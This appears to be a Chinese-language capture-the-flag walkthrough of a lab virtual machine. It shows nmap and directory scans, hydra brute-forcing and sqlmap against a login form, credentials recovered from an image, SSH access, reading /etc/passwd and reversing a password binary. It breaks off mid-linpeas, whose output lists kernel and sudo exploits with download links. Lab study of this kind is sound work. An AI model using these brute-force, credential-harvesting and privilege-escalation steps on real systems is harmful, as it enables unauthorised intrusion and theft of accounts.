Initiating SYN Stealth Scan at 05:27
Scanning 192.168.0.101 [2 ports]
Discovered open port 22/tcp on 192.168.0.101
Discovered open port 80/tcp on 192.168.0.101
Completed SYN Stealth Scan at 05:27, 0.02s elapsed (2 total ports)
Initiating Service scan at 05:27
Scanning 2 services on 192.168.0.101
Completed Service scan at 05:27, 6.03s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.101
NSE: Script scanning 192.168.0.101.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:27
Completed NSE at 05:27, 0.36s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:27
Completed NSE at 05:27, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:27
Completed NSE at 05:27, 0.00s elapsed
Nmap scan report for 192.168.0.101
Host is up, received arp-response (0.00041s latency).
Scanned at 2026-01-17 05:27:40 EST for 8s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15/h5hBsS/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9/wPmo6RBeb1d5t11SP8R5UHyI/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
|   256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-title: \xE9\x9D\x9E\xE4\xB8\xBB\xE6\xB5\x81\xE7\x82\xAB\xE9\x85\xB7\xE7\xA9\xBA\xE9\x97\xB4 | \xE6\xAC\xA2\xE8\xBF\x8E\xE5\x85\x89\xE4\xB8\xB4
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:85:7C:03 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/17%OT=22%CT=%CU=39195%PV=Y%DS=1%DC=D%G=N%M=080027
OS:%TM=696B6424%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=Z%II
OS:=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7
OS:%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%
OS:W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=40%CD=S)

Uptime guess: 7.338 days (since Fri Jan  9 21:21:48 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.0.101

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:27
Completed NSE at 05:27, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:27
Completed NSE at 05:27, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:27
Completed NSE at 05:27, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.26 seconds
           Raw packets sent: 25 (1.894KB) | Rcvd: 17 (1.366KB)

80端口

我嘞个豆

目录扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# gobuster dir -u 192.168.0.101 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.101
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              yaml,php,txt,html,zip,db,bak,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 9042]
/login.php            (Status: 200) [Size: 2771]
/logout.php           (Status: 302) [Size: 0] [--> login.php]                                                   
/dashboard.php        (Status: 302) [Size: 0] [--> login.php]

┌──(web)─(root㉿kali)-[/home/kali]
└─# dirsearch -u http://192.168.0.101                
/root/.pyenv/versions/3.11.9/envs/web/lib/python3.11/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.0.101/_26-01-17_05-28-59.txt

Target: http://192.168.0.101/

[05:28:59] Starting: 
[05:29:00] 403 -  278B  - /.ht_wsr.txt
[05:29:00] 403 -  278B  - /.htaccess.bak1
[05:29:00] 403 -  278B  - /.htaccess.orig
[05:29:00] 403 -  278B  - /.htaccess.save
[05:29:00] 403 -  278B  - /.htaccess_extra
[05:29:00] 403 -  278B  - /.htaccess.sample
[05:29:00] 403 -  278B  - /.htaccess_orig
[05:29:00] 403 -  278B  - /.htaccess_sc
[05:29:00] 403 -  278B  - /.htaccessOLD2
[05:29:00] 403 -  278B  - /.htaccessOLD
[05:29:00] 403 -  278B  - /.htaccessBAK
[05:29:00] 403 -  278B  - /.htm
[05:29:00] 403 -  278B  - /.html
[05:29:00] 403 -  278B  - /.htpasswd_test
[05:29:00] 403 -  278B  - /.htpasswds
[05:29:00] 403 -  278B  - /.httr-oauth
[05:29:01] 403 -  278B  - /.php
[05:29:15] 302 -    0B  - /dashboard.php  ->  login.php
[05:29:25] 200 -  937B  - /login.php
[05:29:26] 302 -    0B  - /logout.php  ->  login.php
[05:29:42] 403 -  278B  - /server-status
[05:29:42] 403 -  278B  - /server-status/

Task Completed

/login.php

POST /login.php HTTP/1.1

Host: 192.168.0.101

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded

Content-Length: 29

Origin: http://192.168.0.101

Connection: keep-alive

Referer: http://192.168.0.101/login.php

Cookie: PHPSESSID=g7hip4qlponncgkf301noj3mdp

Upgrade-Insecure-Requests: 1

Priority: u=0, i

username=admin&password=admin

HTTP/1.1 200 OK

Date: Sat, 17 Jan 2026 10:33:01 GMT
Server: Apache/2.4.62 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2841
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8



<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>登录系统</title>

</head>
<body>
    <div class="login-container">
        <h2>系统登录</h2>
        
                    <div class="error">用户名或密码错误</div>
                
        <form method="POST" action="login.php">
            <div class="form-group">
                <label for="username">用户名</label>
                <input type="text" id="username" name="username" required autofocus>
            </div>
            
            <div class="form-group">
                <label for="password">密码</label>
                <input type="password" id="password" name="password" required>
            </div>
            
            <button type="submit" class="btn">登录</button>
        </form>
    </div>
</body>
</html>

hydra爆破-失败

┌──(web)─(root㉿kali)-[/home/kali]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 192.168.0.101 http-post-form "/login.php:username=^USER^&password=^PASS^:用户名或密码错误"

hydra -l todd -P /usr/share/wordlists/rockyou.txt -f 192.168.0.101 http-post-form "/login.php:username=^USER^&password=^PASS^:用户名或密码错误"

Sqlmap尝试-失败

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# sqlmap -r post --batch  
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.10.1.47#dev}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:38:26 /2026-01-17/

[05:38:26] [INFO] parsing HTTP request from 'post'
[05:38:26] [INFO] testing connection to the target URL
[05:38:27] [INFO] checking if the target is protected by some kind of WAF/IPS
[05:38:27] [INFO] testing if the target URL content is stable
[05:38:28] [INFO] target URL content is stable
[05:38:28] [INFO] testing if POST parameter 'username' is dynamic
[05:38:28] [WARNING] POST parameter 'username' does not appear to be dynamic
[05:38:28] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[05:38:28] [INFO] testing for SQL injection on POST parameter 'username'
[05:38:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'                                    
[05:38:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'                            
[05:38:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                    
[05:38:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'                                 
[05:38:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'           
[05:38:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'                           
[05:38:28] [INFO] testing 'Generic inline queries'
[05:38:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'                                          
[05:38:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'                               
[05:38:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'                        
[05:38:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'                                  
[05:38:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'                                               
[05:38:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'                                   
[05:38:28] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[05:38:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'                                        
[05:38:28] [WARNING] POST parameter 'username' does not seem to be injectable
[05:38:28] [INFO] testing if POST parameter 'password' is dynamic
[05:38:29] [WARNING] POST parameter 'password' does not appear to be dynamic
[05:38:29] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[05:38:29] [INFO] testing for SQL injection on POST parameter 'password'
[05:38:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'                                    
[05:38:31] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'                            
[05:38:31] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'                                                    
[05:38:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'                                 
[05:38:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'           
[05:38:34] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'                           
[05:38:35] [INFO] testing 'Generic inline queries'
[05:38:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'                                          
[05:38:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'                               
[05:38:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'                        
[05:38:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'                                  
[05:38:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'                                               
[05:38:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'                                   
[05:38:42] [INFO] testing 'Oracle AND time-based blind'
[05:38:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'                                        
[05:38:46] [WARNING] POST parameter 'password' does not seem to be injectable
[05:38:46] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 05:38:46 /2026-01-17/

图片隐写

提取首页的todd图片

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# binwalk todd.png  

                                          /home/kali/Desktop/hmv/todd.png
-------------------------------------------------------------------------------------------------------------------
DECIMAL                            HEXADECIMAL                        DESCRIPTION
-------------------------------------------------------------------------------------------------------------------
0                                  0x0                                PNG image, total size: 12928 bytes
-------------------------------------------------------------------------------------------------------------------

Analyzed 1 file for 85 file signatures (187 magic patterns) in 2.0 milliseconds

                                                                                                                   
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# strings todd.png 

....
/T1i
5iMZ
IEND
todd:toddishandsome

看到最下面一行todd:toddishandsome

尝试登录获得凭据

admin/toddishandsome

/dashboard.php

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>仪表盘</title>
</head>
<body>
    <div class="header">
        <h1>系统仪表盘</h1>
    </div>
    
    <div class="container">
        <div class="welcome">
            欢迎, admin!
        </div>
        
        <div class="card">
            <h3>系统信息</h3>
            <p>您已成功登录系统。这是一个简单的仪表盘页面，用于演示目的。</p>
        </div>
       <!-- 
        <div class="card">
            <a href="hyh" class="hyhforever" target="_blank"></a>
        </div>
        -->
        <div class="card">
            <h3>账户操作</h3>
            <a href="logout.php" class="btn">退出登录</a>
        </div>
    </div>
</body>
</html>

发现被注释的一段

<!-- 
<div class="card">
    <a href="hyh" class="hyhforever" target="_blank"></a>
</div>
-->

部分	含义
`href="hyh"`	非常可疑的路径
`class="hyhforever"`	明确是“彩蛋/后门”命名
被注释	防止普通用户看到

👉 结论：**/hyh**** 是你下一步要打的点**

这里fuff了半天没出

ssh登录

hyh/hyhforever

hyh@Guoqing:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
segfault:x:1000:1000:,,,:/home/segfault:/bin/bash
hyh:x:1001:1001:,,,:/home/hyh:/bin/bash
todd:x:1002:1002:,,,:/home/todd:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false

提权

segfaultno8

/opt/password

/opt$ strings password /lib64/ld-linux-x86-64.so.2 mgUa strcpy puts stdin printf fgets strlen strcspn __ctype_b_loc __cxa_finalize strcmp __libc_start_main libc.so.6 GLIBC_2.3 GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable u/UH gfffH vhjidxowH []A\A]A^A_ Please enter the password for segfault: Incorrect password length. The password should be %d characters long. Please try again: Password correct! Access granted. Incorrect password. Please try again: Too many failed attempts. Access denied. ;*3$" GCC: (Debian 10.2.1-6) 10.2.1 20210110 crtstuff.c deregister_tm_clones __do_global_dtors_aux completed.0 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry password.c __FRAME_END__ __init_array_end _DYNAMIC __init_array_start __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_csu_fini _ITM_deregisterTMCloneTable strcpy@GLIBC_2.2.5 puts@GLIBC_2.2.5 stdin@GLIBC_2.2.5 _edata strlen@GLIBC_2.2.5 printf@GLIBC_2.2.5 strcspn@GLIBC_2.2.5 __libc_start_main@GLIBC_2.2.5 fgets@GLIBC_2.2.5 __data_start strcmp@GLIBC_2.2.5 __gmon_start__ __dso_handle _IO_stdin_used __libc_csu_init __bss_start main caesar_encrypt __TMC_END__ _ITM_registerTMCloneTable __cxa_finalize@GLIBC_2.2.5 __ctype_b_loc@GLIBC_2.3 .symtab .strtab .shstrtab .interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .got.plt .data .bss .comment

scp hyh@192.168.0.101:/opt/password /home/kali/Desktop/hmv/password

pwndbg下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char dest[64]; // [rsp+0h] [rbp-90h] BYREF
  char s[64]; // [rsp+40h] [rbp-50h] BYREF
  char s2[12]; // [rsp+80h] [rbp-10h] BYREF
  int v7; // [rsp+8Ch] [rbp-4h]

  strcpy(s2, "vhjidxowqr1");
  v7 = 0;
  printf("Please enter the password for segfault: ");
  while ( fgets(s, 50, stdin) )
  {
    s[strcspn(s, "\n")] = 0;
    if ( strlen(s) == 11 )
    {
      strcpy(dest, s);
      caesar_encrypt(dest);
      if ( !strcmp(dest, s2) )
      {
        puts("Password correct! Access granted.");
        return 0;
      }
      printf("Incorrect password. Please try again: ");
      if ( ++v7 > 4 )
      {
        puts("\nToo many failed attempts. Access denied.");
        return 1;
      }
    }
    else
    {
      printf("Incorrect password length. The password should be %d characters long.\n", 11LL);
      printf("Please try again: ");
    }
  }
  return 0;
}

拿到凭据

hyh@Guoqing:/opt$ ./password 
Please enter the password for segfault: ykmlgarz456
Incorrect password. Please try again: segfaultno8
Password correct! Access granted.

得到密码segfaultno8

尝试登录没成功

hyh@Guoqing:/home/segfault$ cat name1.txt 
sublarge
hyh@Guoqing:/home/segfault$ cat name2.txt 
bamuwe
hyh@Guoqing:/home/segfault$ cat name3.txt 
LingMj

尝试组合作为密码登录没成功

segfaultno8

hyh@Guoqing:~$ find / -user segfault -type f 2>/dev/null
/usr/local/bin/irc_bot.py
/home/segfault/.bash_logout
/home/segfault/.bashrc
/home/segfault/.profile
hyh@Guoqing:~$ cat /usr/local/bin/irc_bot.pycat: /usr/local/bin/irc_bot.py: Permission denied

hyh@Guoqing:~$ cat /etc/systemd/system/irc_bot.service
[Unit]
Description=IRC Bot Service
After=network.target

[Service]
User=pycrtlake
Group=pycrtlake
WorkingDirectory=/usr/local/bin
ExecStart=/usr/bin/python3 /usr/local/bin/irc_bot.py
Restart=always
RestartSec=5
StandardOutput=syslog
StandardError=syslog
Environment=PYTHONUNBUFFERED=1

[Install]
WantedBy=multi-user.target
hyh@Guoqing:~$ ls -la /etc/inspircd/
ls: cannot open directory '/etc/inspircd/': Permission denied
hyh@Guoqing:~$ cat /etc/inspircd/*.conf 2>/dev/null
hyh@Guoqing:~$ cat /var/log/inspircd.log
cat: /var/log/inspircd.log: Permission denied
hyh@Guoqing:~$ tail -100 /var/log/inspircd.log
tail: cannot open '/var/log/inspircd.log' for reading: Permission denied
hyh@Guoqing:~$ cat /usr/local/bin/calc-prorate
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from tempora import calculate_prorated_values
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(calculate_prorated_values())
hyh@Guoqing:~$

1.weechat│WeeChat 3.0 (C) 2003-2020 - https://weechat.>>
         │07:33:49     |   __ |/ |/ / /  __/  __/ /___
         │             | _  / / / /_/ // /_  
         │07:33:49     |   ____/|__/  \___/\___/\____/
         │             | /_/ /_/\__,_/ \__/  
         │07:33:49     | WeeChat 3.0 [compiled on Jan 23
         │             | 2022 14:29:14]
         │07:33:49     | - - - - - - - - - - - - - - - -
         │             | - - - - - - - - - - - - - - - -

没招了

本地 IRC 服务 + 可交互 bot

1️⃣ nc 根本不存在

nc: command not found

2️⃣ inspircd 并未监听任何 IRC 端口

你之前 **ss -lntup** 的结果只有：

22
80
3306 (127.0.0.1)

👉** **没有 6667 / 6697

3️⃣ weechat 只是你“本地客户端”

你现在看到的：

WeeChat 3.0
irc: unable to add temporary server

**只是你启动了 IRC 客户端程序本身
👉 **不是连上了任何服务器

4️⃣ 你在 bash 里敲的这些：

NICK hyh
!auth segfaultno8

全部变成：

-bash: command not found

**这说明：
**你从头到尾根本没连进任何 IRC session。

linpeas

Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html                                                      
 LEGEND:                                                
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting LinPEAS. Caching Writable Folders...
                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════                             
                               ╚═══════════════════╝    
OS: Linux version 4.19.0-27-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.316-1 (2024-06-25)
User & Groups: uid=1001(hyh) gid=1001(hyh) groups=1001(hyh)
Hostname: Guoqing

[+] /usr/bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h)           
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h) 
                                                        

Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE  
                                                        
                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════                              
                              ╚════════════════════╝    
╔══════════╣ Operative system
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits               
Linux version 4.19.0-27-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.316-1 (2024-06-25)
Distributor ID: Debian
Description:    Debian GNU/Linux 10 (buster)
Release:        10
Codename:       buster

╔══════════╣ Sudo version
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version                  
Sudo version 1.9.5p2                                    


╔══════════╣ PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses          
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

╔══════════╣ Date & uptime
Sat 17 Jan 2026 07:44:53 AM EST                         
 07:44:53 up  2:17,  2 users,  load average: 0.00, 0.00, 0.00

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices               
UUID=80e68759-1ca0-45eb-82a7-601b1f78dfe5 /               ext4    errors=remount-ro 0       1
UUID=257f425d-1ea4-4b8e-8dd8-69523f25d249 none            swap    sw              0       0
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk                                                    
sda
sda1
sda2
sda5

╔══════════╣ Environment
╚ Any private information inside environment variables? 
USER=hyh                                                
SSH_CLIENT=192.168.0.106 35646 22
SHLVL=1
HOME=/home/hyh
SSH_TTY=/dev/pts/1
LOGNAME=hyh
_=/tmp/linpeas.sh
TERM=xterm-256color
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
SHELL=/bin/bash
PWD=/home/hyh
SSH_CONNECTION=192.168.0.106 35646 192.168.0.101 22

╔══════════╣ Searching Signature verification failed in dmesg                                                   
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed                                                   
dmesg Not Found                                         
                                                        
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester      
[+] [CVE-2019-13272] PTRACE_TRACEME                     

   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
   Exposure: highly probable
   Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
   Comments: Requires an active PolKit agent.

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
